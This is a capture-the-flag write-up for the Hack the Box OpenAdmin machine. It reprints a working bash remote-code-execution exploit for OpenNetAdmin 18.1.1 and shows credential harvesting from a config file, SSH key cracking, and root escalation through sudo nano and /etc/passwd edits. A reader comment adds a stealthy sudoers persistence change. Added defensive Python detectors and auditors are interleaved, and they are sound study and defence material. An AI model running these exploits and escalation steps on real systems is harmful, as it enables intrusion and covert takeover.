Hello, welcome to our Hack the Box write-up series. Today we are doing OpenAdmin (10.10.10.171), an easy Linux box.
HackTheBox's first machine of 2020 seems to be a New Year's gift from HTB to all its users to gain some points and ranks. This machine is very simple and straightforward.
Let us start.
NMAP Port Scan
As usual, let us add the machine's IP to /etc/hosts as openadmin.htb for easier access. The next step is to start the nmap scan.
# root @ ns09 in ~/htb/openadmin [21:53:45]
$ cat OpenAdmin_all_ports.nmap
# Nmap 7.80 scan initiated Sun Jan 5 23:03:08 2020 as: nmap -sC -sV -T5 -p- -oA OpenAdmin_all_ports openadmin.htb
Warning: 10.10.10.171 giving up on port because retransmission cap hit (2).
Nmap scan report for openadmin.htb (10.10.10.171)
Host is up (0.15s latency).
Not shown: 65503 closed ports, 30 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 5 23:16:37 2020 -- 1 IP address (1 host up) scanned in 808.45 seconds
# root @ ns09 in ~/htb/openadmin [21:53:57]
The nmap scan shows two open ports: SSH on TCP 22 and HTTP on TCP 80. A quick visit to port 80 shows the Apache2 default welcome page.
The box has not disclosed anything interesting so far apart from a web page and SSH. We need to find directories for better enumeration, so let us run DirBuster with its medium wordlist and start the scan.
Let DirBuster run in the background while we start enumerating the subdirectories it showed in the initial results. I concentrated on two directories, ONA and Music. Opening http://openadmin.htb/ona took me to a web page: the OpenNetAdmin control panel. OpenNetAdmin is an open-source IP Address Management (IPAM) system.
A warning on the homepage shows that the app version is 18.1.1. A quick Google search for vulnerabilities in version 18.1.1 shows that this version is vulnerable to remote code execution (RCE). So, at this point, we understood that this box is a victim of a recently discovered exploit.
Exploit-DB listed two exploits: a Metasploit module and a bash script.
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
#!/bin/bash
URL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
I just downloaded the script to my OpenAdmin working directory and ran it. The script gave me a shell as www-data immediately.
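From the defender's side, the request the script above sends is easy to recognise: the ping tooltip's xajaxargs value should only ever carry an IP address, so any shell metacharacter in it is an injection attempt. The following is an added example (not part of the write-up, the exploit, or the OpenNetAdmin project) that decodes form-encoded request bodies and flags such values; it generalises beyond the `;` used by the script to backticks, pipes and `$(...)`. The sample bodies are constructed, not captured traffic.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample POST bodies (not captured traffic) in the shape OpenNetAdmin's
# xajax endpoint receives; the second one has the injection shape of the exploit script.
SAMPLE_BODIES = [
    "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
    "&xajaxargs[]=ip%3D%3E10.10.10.5&xajaxargs[]=ping",
    "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
    "&xajaxargs[]=ip%3D%3E;echo%20%22BEGIN%22;id;echo%20%22END%22&xajaxargs[]=ping",
    "xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E10.0.0.1%60id%60&xajaxargs[]=ping",
    "login=jimmy&password=hunter2",
]

# Shell metacharacters that have no business inside an IP argument to the ping tooltip.
SHELL_META = re.compile(r"[;&|`\n]|\$\(")


def parse_form_body(body):
    """Split an application/x-www-form-urlencoded body by hand: parse_qs on older
    Pythons also splits on ';', the very character we want to inspect."""
    params = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def suspicious_xajax_args(body):
    """Return decoded xajaxargs values carrying shell metacharacters, or [] if clean."""
    params = parse_form_body(body)
    if params.get("xajax") != ["window_submit"]:
        return []
    return [arg for arg in params.get("xajaxargs[]", []) if SHELL_META.search(arg)]


def scan_bodies(bodies):
    """Pair each body index with its suspicious arguments, skipping clean bodies."""
    results = []
    for i, body in enumerate(bodies):
        hits = suspicious_xajax_args(body)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for i, hits in scan_bodies(SAMPLE_BODIES):
        print(f"body {i}: possible command injection in xajaxargs: {hits}")
```

The check is meant to run over request bodies (a WAF or mod_security audit log), not the Apache access log, since POST bodies are not recorded there.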
Since www-data is a low-privileged user, we will not be able to perform any major tasks, so we need to escalate to a more privileged user.
First, we need to find the users on the box. Let us check whether we can read /etc/passwd to list them.
$ ls -l /etc/passwd
-rw-r--r-- 1 root root 1660 Nov 22 18:01 /etc/passwd
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
$
So we found a number of users on this box, but I'm not sure which one I should target first to get privileges. Let us start enumerating the box for hints.
After a while, I found a PHP file called “database_settings.inc.php” in the directory /opt/ona/www/local/config/. The file has MySQL database credentials.
So far, we are not sure which user we could use these credentials for, so I went back to the list of local users on the box, which gave jimmy and joanna.
$ cat /opt/ona/www/local/config/database_settings.inc.php
<?php
$ona_contexts=array (
'DEFAULT' =>
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);
$
Privilege Escalation
As SSH was running, I tried to SSH into the box as jimmy with the database password, and luckily it worked.
# root @ ns09 in ~/htb/openadmin [20:32:08]
$ ssh jimmy@openadmin.htb
jimmy@openadmin.htb's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Jan 8 17:33:45 UTC 2020
System load: 0.38 Processes: 200
Usage of /: 49.1% of 7.81GB Users logged in: 2
Memory usage: 34% IP address for ens160: 10.10.10.171
Swap usage: 0%
=> There is 1 zombie process.
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Jan 8 17:30:22 2020 from 10.10.15.63
jimmy@openadmin:~$ ls
jimmy@openadmin:~$ cd home
-bash: cd: home: No such file or directory
jimmy@openadmin:~$ ls -la
total 32
drwxr-x--- 5 jimmy jimmy 4096 Nov 22 23:15 .
drwxr-xr-x 4 root root 4096 Nov 22 18:00 ..
lrwxrwxrwx 1 jimmy jimmy 9 Nov 21 14:07 .bash_history -> /dev/null
-rw-r--r-- 1 jimmy jimmy 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 jimmy jimmy 3771 Apr 4 2018 .bashrc
drwx------ 2 jimmy jimmy 4096 Nov 21 13:52 .cache
drwx------ 3 jimmy jimmy 4096 Nov 21 13:52 .gnupg
drwxrwxr-x 3 jimmy jimmy 4096 Nov 22 23:15 .local
-rw-r--r-- 1 jimmy jimmy 807 Apr 4 2018 .profile
jimmy@openadmin:~$
However, after a while I realized this user doesn't have a user flag, so let us enumerate further. The /var/www folder has a special folder called “internal” which contained:
jimmy@openadmin:~$ cd /
jimmy@openadmin:/$ ls
bin cdrom etc initrd.img lib lost+found mnt proc run snap swap.img tmp var vmlinuz.old
boot dev home initrd.img.old lib64 media opt root sbin srv sys usr vmlinuz
jimmy@openadmin:/$ cd var
jimmy@openadmin:/var$ ls
backups cache crash lib local lock log mail opt run snap spool tmp www
jimmy@openadmin:/var$ cd www
jimmy@openadmin:/var/www$ ls
html internal ona
jimmy@openadmin:/var/www$ cd internal
jimmy@openadmin:/var/www/internal$ ls
index.php logout.php main.php
jimmy@openadmin:/var/www/internal$ cat main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$
The file “main.php” is our key to getting user joanna's private key and logging in as joanna. Note that the script sends a Location header when no session is set but never calls exit(), so PHP keeps executing and prints the key regardless of whether you are logged in; all we need is to request the page with cURL. When I ran cURL against 127.0.0.1 on port 80, I was blocked by a “404 Not Found” error, which made me realize I needed to find the port the internal site actually listens on.
jimmy@openadmin:~$ curl http://127.0.0.1/main.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>
jimmy@openadmin:~$
To find open ports within the system, I ran “netstat -tulpn”. netstat listed a few listening ports:
jimmy@openadmin:/var/www/internal$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:52846 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
I tried them one by one; the second port, 52846, returned the private key of user joanna.
jimmy@openadmin:/var/www/internal$ curl http://127.0.0.1:3306/main.php
Warning: Binary output can mess up your terminal. Use "--output -" to tell
Warning: curl to output it to your terminal anyway, or consider "--output
Warning: <FILE>" to save to a file.
jimmy@openadmin:/var/www/internal$ curl http://127.0.0.1:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
[encrypted key body omitted]
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$
The SSH key has a passphrase, so I copied the key to my Kali machine and used John to crack it with rockyou.txt. John cracked the passphrase as “bloodninjas”. I immediately SSHed into the box as joanna and got user.txt.
joanna@openadmin:~$ ls
user.txt
joanna@openadmin:~$ cat user.txt
c9b2c[---------]c81b5f
joanna@openadmin:~$
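Why did John get through this key so quickly? The key is in the traditional PEM framing (“Proc-Type: 4,ENCRYPTED” with a DEK-Info line), where OpenSSL derives the AES key from the passphrase with a single MD5 pass, so every wordlist guess costs one hash; the current OpenSSH key format instead runs a bcrypt-based KDF that makes each guess expensive. The following added example (not from the write-up or any project) classifies a private key by its framing and reports whether it should be re-keyed. The PEM samples are constructed placeholders with no real key material, and the OpenSSH sample is built by a helper that emits only the header fields the classifier reads.

```python
import base64
import re
import struct

MAGIC = b"openssh-key-v1\x00"

# Constructed sample in the traditional PEM framing seen on the box: the DEK-Info line
# carries cipher and IV; the base64 body is a placeholder, not a real key.
LEGACY_PEM_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

UGxhY2Vob2xkZXIga2V5IGJvZHksIG5vdCByZWFsIGtleSBtYXRlcmlhbA==
-----END RSA PRIVATE KEY-----
"""

# Constructed unencrypted PEM sample (placeholder body).
LEGACY_PEM_PLAIN = """-----BEGIN RSA PRIVATE KEY-----
UGxhY2Vob2xkZXIga2V5IGJvZHksIG5vdCByZWFsIGtleSBtYXRlcmlhbA==
-----END RSA PRIVATE KEY-----
"""


def _ssh_string(data):
    # SSH wire format: 4-byte big-endian length followed by the bytes.
    return struct.pack(">I", len(data)) + data


def _read_string(blob, off):
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n


def build_openssh_header(cipher, kdf):
    """Constructed openssh-key-v1 framing with only the fields the classifier reads
    (magic, ciphername, kdfname, empty kdfoptions, nkeys=1). Not a loadable key."""
    blob = MAGIC + _ssh_string(cipher) + _ssh_string(kdf) + _ssh_string(b"") + struct.pack(">I", 1)
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
            + base64.b64encode(blob).decode() + "\n"
            "-----END OPENSSH PRIVATE KEY-----\n")


def classify_private_key(text):
    """Report framing, encryption state, cipher and KDF of a private key file."""
    lines = [l.strip() for l in text.strip().splitlines() if l.strip()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(MAGIC):
            return {"format": "openssh", "error": "bad magic"}
        cipher, off = _read_string(blob, len(MAGIC))
        kdf, _ = _read_string(blob, off)
        return {"format": "openssh", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "weak_kdf": False}
    if re.match(r"-----BEGIN (RSA|DSA|EC) PRIVATE KEY-----", lines[0]):
        encrypted = any(l.startswith("Proc-Type: 4,ENCRYPTED") for l in lines)
        dek = next((l.split(":", 1)[1].strip() for l in lines if l.startswith("DEK-Info:")), "")
        return {"format": "pem", "encrypted": encrypted,
                "cipher": dek.split(",")[0] if dek else "none",
                # Traditional PEM: EVP_BytesToKey with MD5, one iteration, so guesses are cheap.
                "kdf": "EVP_BytesToKey(MD5, 1 iteration)" if encrypted else "none",
                "weak_kdf": encrypted}
    return {"format": "unknown"}


def needs_rekey(text):
    """True unless the key is OpenSSH-format, encrypted, and protected by bcrypt."""
    info = classify_private_key(text)
    return not (info.get("format") == "openssh" and info.get("encrypted") and info.get("kdf") == "bcrypt")


if __name__ == "__main__":
    for name, key in [("legacy-encrypted", LEGACY_PEM_ENCRYPTED), ("legacy-plain", LEGACY_PEM_PLAIN),
                      ("modern", build_openssh_header(b"aes256-ctr", b"bcrypt"))]:
        print(name, classify_private_key(key), "rekey" if needs_rekey(key) else "ok")
```

A key that this flags can be rewritten in place with `ssh-keygen -p -a 100 -f <keyfile>` (add `-o` on OpenSSH older than 7.8), which re-encrypts it under the bcrypt KDF with a passphrase that should be long enough to survive a wordlist attack.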
Getting Into the Root
There are two ways to get root on this machine using the privileges of our user joanna. The first is very simple: open nano as root and read the root.txt file. The second is getting a shell as root by adding yourself as a root user in /etc/passwd and then switching to your own user name.
Procedure 1: getting the root flag from nano:
The sudo -l command revealed that joanna can run /bin/nano /opt/priv as root without a password. When a user can run nano as root, it is the simplest thing to exploit: just three commands and the box is yours.
Run:
joanna@openadmin:~$ sudo /bin/nano /opt/priv
If sudo asks you to confirm that you really want to run the file as root, obviously say “yes”.
Now that you have nano running as root, press Ctrl+R (Read File) and enter /root/root.txt.
Then Ctrl+O (Write File) to read root.txt.
Procedure 2: Adding yourself as a root user
Press Ctrl+O to read the file /etc/passwd.
Now that nano displays the contents of /etc/passwd, create a user in your name, assign a password, and save using Ctrl+O (Write File). Then exit nano and go back to the terminal.
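The rule that made both procedures possible, `joanna` running `/bin/nano /opt/priv` as root with NOPASSWD, looks restrictive because it is pinned to one file, but nano can read and write any file once it runs as root, so the pin contains nothing. The following added example (not from the write-up) is a small sudoers audit that flags NOPASSWD rules for editors and other shell-escape binaries, and unrestricted ALL rules without a password. The sudoers text is a constructed sample: one line mirrors the rule this box's `sudo -l` reported, and the last line mirrors the rule a commenter below says they added instead of creating a new account.

```python
import re

# Constructed /etc/sudoers-style sample (not copied from any host). Line 5 is the rule
# this box's `sudo -l` reported for joanna; line 7 is the shape of the rule a commenter
# says they added instead of creating a new account.
SAMPLE_SUDOERS = """\
# sudoers sample (constructed)
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
joanna  ALL=(ALL) NOPASSWD: /bin/nano /opt/priv
www-data ALL=(root) NOPASSWD: /bin/cat /var/log/apache2/error.log
joanna  ALL=(ALL) NOPASSWD: ALL
"""

# Programs that, once running as root, can read or write any file or drop to a shell,
# so pinning them to one argument (as with /opt/priv here) does not contain them.
SHELL_ESCAPE_BINARIES = {"nano", "vi", "vim", "less", "more", "man", "awk", "perl",
                         "python", "python3", "find", "bash", "sh", "env"}

# user  host = (runas) TAG: cmd, cmd ...   (a simplified sudoers grammar)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


def audit_sudoers(text):
    """Return one finding per command spec that amounts to unconstrained root."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        nopasswd = "NOPASSWD" in tags
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            reasons = []
            if cmd == "ALL" and nopasswd:
                reasons.append("ALL commands without a password")
            elif cmd != "ALL":
                binary = cmd.split()[0].rsplit("/", 1)[-1]
                if binary in SHELL_ESCAPE_BINARIES:
                    reasons.append(f"{binary} can escape to a shell or read/write any file as root")
                    if nopasswd:
                        reasons.append("NOPASSWD")
            if reasons:
                findings.append({"line": lineno, "user": m.group("user"),
                                 "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {f['line']}: {f['user']} -> {f['command']}: {'; '.join(f['reasons'])}")
```

Run it against `/etc/sudoers` and the files under `/etc/sudoers.d/` as part of a host baseline; any hit for a non-admin account is a root-equivalent grant regardless of how narrow the command path looks.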
That’s it. Thank you for reading.
When I connect to SSH it says the password is wrong! So how did you get the connection? 😀
I had the right password, lol. Check your password. BTW, I just woke my laptop up from sleep and logged in, connected to the HTB VPN and then connected via SSH, just to check if I was wrong, but I was right, it's working.
When I connect for the first time with user [jimmy] and password [n1nj4W4rri0R!] using SSH on Kali [ssh jimmy@openadmin.htb] it says permission denied, so I don't know why that happens after I type the password, even though I reset the machine more than once!!
Hello,
I just left you some respect on HTB. I appreciate you posting your methods. I try to find at least 2 or 3 write-ups to compare how I approached the problem with how others did. Interestingly enough, I always find something and learn something new. I just wanted to say thanks, and BTW you can use nano to run commands: you can do a Ctrl+R and then a Ctrl+X … this approach was helpful for me when taking down OpenAdmin.
Cheers,
Ch3ckm473
Thanks for the respect and for the nano suggestion 🙂
It was a good write-up. I couldn't get John to work, but the rest was good. The only thing I did differently was, instead of adding an account for myself, I just modified /etc/sudoers to say
joanna (ALL) NOPASSWD: ALL.
No additional users to raise suspicion; it might preserve my presence in the system for a bit longer.